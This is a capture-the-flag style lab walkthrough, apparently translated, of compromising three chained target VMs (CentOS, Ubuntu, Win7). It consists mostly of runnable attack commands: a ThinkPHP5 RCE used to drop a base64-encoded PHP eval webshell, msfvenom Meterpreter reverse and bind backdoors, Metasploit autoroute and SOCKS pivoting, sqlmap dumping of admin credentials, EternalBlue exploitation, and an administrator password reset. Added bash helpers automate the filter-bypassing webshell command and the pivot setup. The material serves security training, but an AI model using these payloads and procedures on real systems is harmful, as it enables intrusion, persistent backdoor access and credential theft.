[Intranet Penetration] CFS Three-layer Target Machine Penetration
Network Topology
The topology of the three target hosts is shown in the figure. The attack machine sits on the 192.168.1.0/24 segment.
- Target1 CentOS 7
- Target2 Ubuntu
- Target3 Win7
The penetration path is as follows:
The attack machine Kali (192.168.1.129) attacks Target1 at 192.168.1.132. Target2 and Target3 cannot reach the external network and only talk on the internal segments, so Target1 has to be compromised first and Target2 attacked through Target1's vmnet2 interface. Once Target2 is taken, it is the springboard for attacking Target3.
Lab setup
- Attack machine (Kali): 192.168.1.129 (vmnet1)
- Target1: 192.168.1.132 (vmnet1), 192.168.22.130 (vmnet2)
- Target2: 192.168.22.128 (vmnet2), 192.168.33.128 (vmnet3)
- Target3: 192.168.33.33 (vmnet3)
The remaining setup details are not repeated here; see: https://blog.csdn.net/qq_61237064/article/details/125602997
Target1
0x01. nmap host discovery
Use nmap on Kali to see which hosts are up on the vmnet1 segment (-sP is the old name for the -sn ping scan):
nmap -T4 -sP 192.168.1.1/24
One host is found: 192.168.1.132
0x02. Port scanning
nmap -T4 -A -p 1-65535 192.168.1.132
Port 80 is open
0x03. ThinkPHP5 RCE vulnerability to get a shell
Opening the site in a browser shows it is running ThinkPHP 5.0, a version with known RCE vulnerabilities.
Run a detection tool against it directly:
The vulnerability is confirmed and commands execute directly, so write a webshell into the web root. $_POST is filtered here, so the shell is base64-encoded on Kali and decoded on the target to bypass the filter:
echo "PD9waHAgQGV2YWwoJF9QT1NUWzFdKTs/Pg==" | base64 -d > x.php
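An added example, not from the original write-up: a small shell helper that builds the `echo "<base64>" | base64 -d > file` command above for any PHP payload and file name, and checks that the command as sent to the target contains none of the filtered tokens. The helper names and the token list are assumptions; the page only says that $_POST is filtered.

```bash
#!/usr/bin/env bash
# Added example, not part of the original write-up: generate the
# `echo "<base64>" | base64 -d > file` command for any PHP payload and
# file name, and check that the command as sent contains none of the
# tokens the target filters. The token list is an assumption (the page
# only says $_POST is filtered); the decoded file is what the filter never sees.

# Print the command to execute on the target.
b64_webshell_cmd() {
  local php=$1 file=$2 b64
  b64=$(printf '%s' "$php" | base64 | tr -d '\n')   # tr: undo base64 line wrapping
  printf 'echo "%s" | base64 -d > %s\n' "$b64" "$file"
}

# Return 0 if none of the given tokens appears literally in $1, 1 otherwise.
passes_filter() {
  local text=$1 token
  shift
  for token in "$@"; do
    case $text in *"$token"*) return 1 ;; esac
  done
  return 0
}

# Recover the payload from a generated command, to confirm the round trip.
decode_from_cmd() {
  local q='"' b64
  b64=${1#*$q}      # drop everything up to the opening quote
  b64=${b64%%$q*}   # drop everything from the closing quote on
  printf '%s' "$b64" | base64 -d
}

PAYLOAD='<?php @eval($_POST[1]);?>'   # the one-line AntSword shell used above
cmd=$(b64_webshell_cmd "$PAYLOAD" x.php)
printf '%s\n' "$cmd"
if passes_filter "$cmd" '$_POST'; then
  echo "encoded command carries no literal \$_POST"
fi
```

The generated command for the payload above is byte-for-byte the one on the page; the filter check is the reason the encoding works at all, so it is worth keeping in the helper when the blacklist on a target is guessed rather than known.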
Connect with AntSword:
Two flags are found in a txt file.
Running ifconfig
shows a second interface on the 22 segment, 192.168.22.130:
So there is an intranet behind Target1.
0x04. Upload an msf backdoor (reverse_tcp) and get a session on the host
Since there is an intranet, we move to msf.
First use msfvenom
to generate an ELF payload; a reverse connection is used here (Target1 connects back to Kali).
Use uname -a
to check Target1's operating system:
(www:/www/wwwroot/ThinkPHP/public) $ uname -a
Linux localhost.localdomain 3.10.0-1062.1.1.el7.x86_64 #1 SMP Fri Sep 13 22:55:44 UTC 2019 x86_64 x86_64 x86_64 GNU/Linux
So it is 64-bit Linux.
Next generate the ELF backdoor: check Kali's own IP address and generate the file to match that IP and the target's OS and architecture:
# generate an ELF backdoor for Target1's OS; lhost is the Kali IP
msfvenom -p linux/x64/meterpreter/reverse_tcp LHOST=192.168.1.129 LPORT=4444 -f elf > shell.elf
Then start the handler in Kali, listening on port 4444 of the local machine:
# run the handler in Kali
msfconsole
use exploit/multi/handler
set payload linux/x64/meterpreter/reverse_tcp
set lhost 192.168.1.129
set lport 4444
exploit
Then upload the ELF to Target1, make it executable and run it:
chmod +x shell.elf
./shell.elf
At this point Target1 has connected back and msf has a Meterpreter session:
Now start the intranet penetration:
Intranet penetration
Target2
Target2 cannot be scanned from Kali with nmap directly. Kali and Target1 are on the same segment, so Target1 could be scanned directly, but Target2 is on the internal 22 segment, which Kali cannot reach. Target1's vmnet2 interface is on the same segment as Target2, though, so traffic to Target2 can be sent through Target1: Target1 becomes the pivot (proxy).
(1) Route detection
The modules that come with msf can be used for this:
- probe the network interfaces (get_local_subnets)
- view the routing table (autoroute -p)
# probe subnet information; the 22 segment is visible
meterpreter > run get_local_subnets
[!] Meterpreter scripts are deprecated. Try post/multi/manage/autoroute.
[!] Example: run post/multi/manage/autoroute OPTION=value [...]
Local subnet: 192.168.1.0/255.255.255.0
Local subnet: 192.168.22.0/255.255.255.0
# view routing information; no routes yet
meterpreter > run autoroute -p
[!] Meterpreter scripts are deprecated. Try post/multi/manage/autoroute.
[!] Example: run post/multi/manage/autoroute OPTION=value [...]
[*] No routes have been added yet
**Routing:** a router receives a packet on one interface, looks up the packet's destination address and forwards it out of another interface. In other words, the data we want to send goes to the router first, and the router sends it on to the destination.
We can add a route so that requests from Kali reach Target1 on the vmnet1 segment and are forwarded on to the vmnet2 segment, which lets msf on Kali talk to the 22 segment (Target2).
So add a route:
Static route configuration
MSF's autoroute module is the routing/forwarding feature built into the MSF framework. On top of an existing Meterpreter session it adds a route to the "intranet", so that MSF itself can reach internal resources that were not directly accessible before. As long as the route is reachable, MSF can probe the target.
# add the route
run autoroute -s 192.168.22.0/24
# view
run autoroute -p
(2) msf proxy configuration
The route has a limitation: it only applies to traffic generated by msf modules through the session. If we open a new terminal and run nmap, the 22 segment is still unreachable, so we also need msf's proxy.
msf has its own proxy module:
auxiliary/server/socks_proxy
Assume the current msf session is session 1, established on Target1's shell. After the route is added, msf can talk to the 22 segment. How do we then use other tools against the 22 segment through session 1?
This is where a proxy comes in: msf opens a port on Kali, other tools connect to that port, and their traffic goes through the session into the 22 segment where Target2
lives.
# first return to the console
background
# configure the socks5 proxy
msf6 > use auxiliary/server/socks_proxy
msf6 auxiliary(server/socks_proxy) > set srvhost 0.0.0.0
msf6 auxiliary(server/socks_proxy) > set srvport 1080
msf6 auxiliary(server/socks_proxy) > run
Note that srvhost 0.0.0.0 binds the proxy on every interface of Kali, so anyone who can reach Kali on port 1080 can use the pivot; if only local tools need it, 127.0.0.1 is the safer choice.
On Kali, edit /etc/proxychains.conf
with vim to configure proxychains:
add a socks5 line with Kali's IP and the port just configured under [ProxyList] (for example socks5 127.0.0.1 1080 when the proxy is only used from Kali itself).
Then probe the port with nmap (note: nmap must be prefixed with proxychains
to go through the msf proxy, and only a TCP connect scan traverses the proxy: add -sT so nmap does not fall back to a raw-socket SYN scan when run as root, and -Pn so it skips ICMP host discovery, which the proxy cannot carry):
proxychains nmap -T4 -Pn -sT -p 80 192.168.22.128
Port 80 is open
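An added example, not part of the original write-up, that covers steps (1) and (2) together: a shell script that parses the `Local subnet:` lines printed by `run get_local_subnets` on the Target1 session, drops the segment Kali is already on, and emits the msfconsole commands for the pivot (`route add`, the console-level equivalent of `run autoroute -s`, followed by the socks_proxy module) together with the matching proxychains ProxyList line. The function names are mine, the addresses and ports are the lab values from above, and the sample output is constructed from the session output shown earlier.

```bash
#!/usr/bin/env bash
# Added example, not part of the original write-up: turn the subnets that
# `run get_local_subnets` prints on the Target1 session into the MSF console
# commands for the pivot (route add + socks_proxy) and the matching
# proxychains ProxyList line. Addresses/ports are the lab values from above.

# Dotted netmask -> prefix length (255.255.255.0 -> 24).
# Returns 1 on a malformed mask or an octet that is not a valid mask octet.
mask_to_cidr() {
  local bits=0 octet
  set -- $(printf '%s' "$1" | tr '.' ' ')
  [ $# -eq 4 ] || return 1
  for octet in "$@"; do
    case $octet in
      255) bits=$((bits + 8)) ;;
      254) bits=$((bits + 7)) ;;
      252) bits=$((bits + 6)) ;;
      248) bits=$((bits + 5)) ;;
      240) bits=$((bits + 4)) ;;
      224) bits=$((bits + 3)) ;;
      192) bits=$((bits + 2)) ;;
      128) bits=$((bits + 1)) ;;
      0)   ;;
      *)   return 1 ;;
    esac
  done
  printf '%s\n' "$bits"
}

# Read `Local subnet: A.B.C.D/MASK` lines on stdin and print, in CIDR form,
# every subnet except $1 (the segment Kali is already on, which needs no
# route through the session). Other lines (the deprecation notice) are ignored.
pivot_subnets() {
  local skip=$1 line net mask
  while IFS= read -r line; do
    case $line in
      "Local subnet: "*) ;;
      *) continue ;;
    esac
    net=${line#Local subnet: }
    mask=${net#*/}
    net=${net%/*}
    if [ "$net" != "$skip" ]; then
      printf '%s/%s\n' "$net" "$(mask_to_cidr "$mask")"
    fi
  done
}

# MSF console commands to run once session $1 is up: one `route add` per
# pivot subnet, then the SOCKS proxy on port $2. SRVHOST is 127.0.0.1 rather
# than 0.0.0.0 so the pivot is not offered to everyone on Kali's LAN.
gen_pivot_rc() {
  local session=$1 socks_port=$2 subnet
  shift 2
  for subnet in "$@"; do
    printf 'route add %s %s\n' "$subnet" "$session"
  done
  printf 'route print\n'
  printf 'use auxiliary/server/socks_proxy\n'
  printf 'set SRVHOST 127.0.0.1\n'
  printf 'set SRVPORT %s\n' "$socks_port"
  printf 'set VERSION 5\n'
  printf 'run -j\n'
}

# ProxyList entry for /etc/proxychains.conf that matches gen_pivot_rc.
proxychains_line() {
  printf 'socks5 127.0.0.1 %s\n' "$1"
}

# Constructed sample: the get_local_subnets output from the Target1 session.
SAMPLE_SUBNETS='[!] Meterpreter scripts are deprecated. Try post/multi/manage/autoroute.
Local subnet: 192.168.1.0/255.255.255.0
Local subnet: 192.168.22.0/255.255.255.0'

# Usage: save the first output as pivot.rc and load it with `resource pivot.rc`
# in the console that owns session 1; append the second line to proxychains.conf.
subnets=$(printf '%s\n' "$SAMPLE_SUBNETS" | pivot_subnets 192.168.1.0)
gen_pivot_rc 1 1080 $subnets
proxychains_line 1080
```

The same script serves the Target2 session later on: feed it that session's `get_local_subnets` output, skip 192.168.22.0 instead of 192.168.1.0, and it emits the route for the 33 segment.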
Set a socks5 proxy in the browser as well:
Visiting the site shows it is built with bagecms:
(3) Use the BageCMS SQL injection to log in to the admin backend and get a shell
The SocksCap tool is useful here: it can push other tools through the proxy.
robots.txt was scanned
and gives away the admin path:
#
# robots.txt for BageCMS
#
User-agent: *
Disallow: /admini/
Disallow: /index.php?r=admini*
Information gathering: the source code hints at the SQL injection point: /index.php?r=vul&keyword=1
We can run sqlmap on it directly, but it needs a proxy, either with sqlmap's own --proxy
parameter or by prefixing proxychains on Kali.
The injection parameter can be given directly: -p keyword
# enumerate database names
proxychains sqlmap -u "http://192.168.22.128/index.php?r=vul&keyword=1" -p keyword --dbs
or
sqlmap -u "http://192.168.22.128/index.php?r=vul&keyword=1" --proxy=socks5://192.168.1.129:1080 -p keyword --dbs --batch
# enumerate the tables in the bagecms database
proxychains sqlmap -u "http://192.168.22.128/index.php?r=vul&keyword=1" -p keyword -D "bagecms" --tables --batch
# enumerate the columns of the bage_admin table
proxychains sqlmap -u "http://192.168.22.128/index.php?r=vul&keyword=1" -p keyword -D "bagecms" -T "bage_admin" --columns --batch
# dump the admin username and password
proxychains sqlmap -u "http://192.168.22.128/index.php?r=vul&keyword=1" -p keyword -D bagecms -T bage_admin -C username,password --dump
# --is-dba was tested and the database user is not privileged, so --os-shell is not attempted
The admin credentials are admin:123qwe
Log in to the backend and get the flag:
Write a webshell into tag/index.php
Then use SocksCap
to push AntSword through the proxy and connect:
Note the URL: http://192.168.22.128/?r=tag
(4) Upload an msf backdoor (bind_tcp) and get a session on the Ubuntu host with a forward connection
After getting the shell we generate a backdoor with msf as before, with one difference: Target2 cannot reach out of its network,
so this time it has to be a forward (bind) connection, that is, Kali
connects to Target2.
Check Target2's operating system in AntSword:
uname -a
It is a 64-bit system,
so generate an ELF bind backdoor on Kali:
# generate a bind backdoor (the intranet host cannot talk to Kali directly, so a reverse connection is impossible; Kali connects to the target through the proxy/route instead)
msfvenom -p linux/x64/meterpreter/bind_tcp LPORT=3333 -f elf > tgt2.elf
Upload it to Target2, make it executable and run it:
chmod +x tgt2.elf
./tgt2.elf
Now start the handler in MSF and connect to Target2. Note the difference: last time, with reverse_tcp, MSF was the listener and Target1 connected to us; this time, with bind_tcp, Target2 is the listener and we connect to Target2. The logic is exactly reversed.
Also note that if a fresh msfconsole is opened for the handler, none of the configuration from the earlier console (the route and the socks proxy) exists in it.
Since bind_tcp makes Target2 the listener, we need to connect forward to Target2 inside the intranet.
So a new console cannot simply be started with msfconsole;
it has to be started with proxychains
so that msf reaches Target2 through the proxy, and then the handler connects to the bind port.
Here is a picture:
(In practice the previous console can simply be reused: the route is already configured there, so the handler's connection to the bind port goes through the session and proxychains is not needed.)
To demonstrate proxychains
here:
proxychains msfconsole
# run in the local MSF
use exploit/multi/handler
set payload linux/x64/meterpreter/bind_tcp
set RHOST 192.168.22.128
set LPORT 3333
run
Target2 is connected and msf has a session.
Continue with information gathering:
# get the network interfaces:
run get_local_subnets
# add the route:
run autoroute -s 192.168.33.0/24
# view the routes:
run autoroute -p
Alternatively, from a shell on the session:
shell
# upgrade to an interactive tty
python -c 'import pty;pty.spawn("/bin/bash");'
# view network information
ifconfig
There is an IP on the 33 segment, so there is a further intranet.
Target3
0x01. Add a route
Since Target2 (Ubuntu) was found to sit on both the 22 and the 33 segment, the previous steps are repeated: add a route so that traffic from Kali goes through the proxy to Target2 and is forwarded from the 22 segment into the 33 segment.
# add the route to the 33 segment
run autoroute -s 192.168.33.0/24
# view
run autoroute -p
The route is added.
nmap scan of Target3's open services
(If a new terminal was opened, the proxy has to be configured in the new msf console first and /etc/proxychains.conf
updated to match.)
root@kali:~# proxychains4 nmap -Pn -sT 192.168.33.33
-Pn: skip host discovery and treat the host as up; ICMP/ARP probes do not travel through the SOCKS proxy, so without it nmap would report the host as down.
-sT: full TCP connect() scan; proxychains only hooks connect(), so this is the scan type that actually goes through the proxy.
Ports 445 and 3389 are open.
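An added example, not from the original write-up, for the two proxied nmap scans on this page (the port 80 check on Target2 and this scan of Target3): a wrapper that only lets nmap through proxychains in a mode that actually traverses the SOCKS proxy. proxychains hooks connect(), so only a TCP connect scan (-sT) goes through it; SYN scans (-sS, nmap's default when run as root), UDP scans, OS detection and ICMP host discovery use raw sockets that bypass the proxy and yield empty results or "host seems down". The function names and the use of proxychains4 -q are my choices.

```bash
#!/usr/bin/env bash
# Added example, not part of the original write-up: run nmap through the MSF
# SOCKS proxy only in a mode that actually traverses it.

# Print the argument list for a proxied scan: the given arguments with -Pn and
# -sT prepended when missing. Returns 1 (and says why on stderr) if an option
# that needs raw sockets is present, because that traffic would bypass the proxy.
proxied_nmap_args() {
  local have_st=0 have_pn=0 a
  for a in "$@"; do
    case $a in
      -sT) have_st=1 ;;
      -Pn) have_pn=1 ;;
      -sS|-sU|-sA|-sW|-sM|-sN|-sF|-sX|-sn|-O)
        printf 'refusing %s: raw-socket option, would bypass the SOCKS proxy\n' "$a" >&2
        return 1 ;;
    esac
  done
  [ "$have_st" -eq 1 ] || set -- -sT "$@"
  [ "$have_pn" -eq 1 ] || set -- -Pn "$@"
  printf '%s\n' "$*"
}

# Full command line. proxychains4 -q silences the per-connection chain output.
proxied_nmap_cmd() {
  local args
  args=$(proxied_nmap_args "$@") || return 1
  printf 'proxychains4 -q nmap %s\n' "$args"
}

# Demo with the two scans from this write-up. The commands are printed, not
# run, so the script works offline; eval the output on Kali to execute them.
proxied_nmap_cmd -T4 -p 80 192.168.22.128
proxied_nmap_cmd -p 445,3389 192.168.33.33
proxied_nmap_cmd -sS 192.168.33.33 || echo "rejected as expected"
```

Keep the host list to IP addresses, or set proxy_dns in proxychains.conf: a hostname resolved by the local resolver would leak the lookup outside the tunnel and, for internal names, simply fail.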
0x02. Use MS17-010 (EternalBlue) to get a shell
The scan results make it clear this is a Win7 system with ports 445 and 3389 open.
The SMB service on port 445 has the MS17-010 (EternalBlue) vulnerability.
So try the ms17-010 modules in msf; a bind payload is used again because Target3 cannot connect back to Kali:
search ms17-010
use exploit/windows/smb/ms17_010_psexec
set payload windows/x64/meterpreter/bind_tcp
set RHOSTS 192.168.33.33
set LPORT 6666
run
Exploitation succeeds and the shell drops into a command line.
Run netstat -ant
to see which ports are listening:
Port 3389 is listening, so Remote Desktop is available.
First use net user
to list the users; there is an administrator account.
Enter: net user administrator 123456
to change its password. (Resetting a user's password is acceptable on a lab machine, but on a real engagement it is a destructive, highly visible action and should be avoided.)
Then use SocksCap
to launch the Remote Desktop client mstsc.exe
through the proxy (note: point it at the new proxy), enter the IP 192.168.33.33 and connect.
Successfully taken.
There is another way to connect, using port forwarding:
portfwd add -l 7777 -p 3389 -r 192.168.33.33
This forwards 192.168.33.33:3389 to port 7777 on Kali, after which an RDP client can connect to 127.0.0.1:7777 directly:
References:
https://www.cnblogs.com/1vxyz/p/17080748.html
https://blog.csdn.net/qq_61237064/article/details/125602997
https://teamssix.com/191021-211425.html#toc-heading-9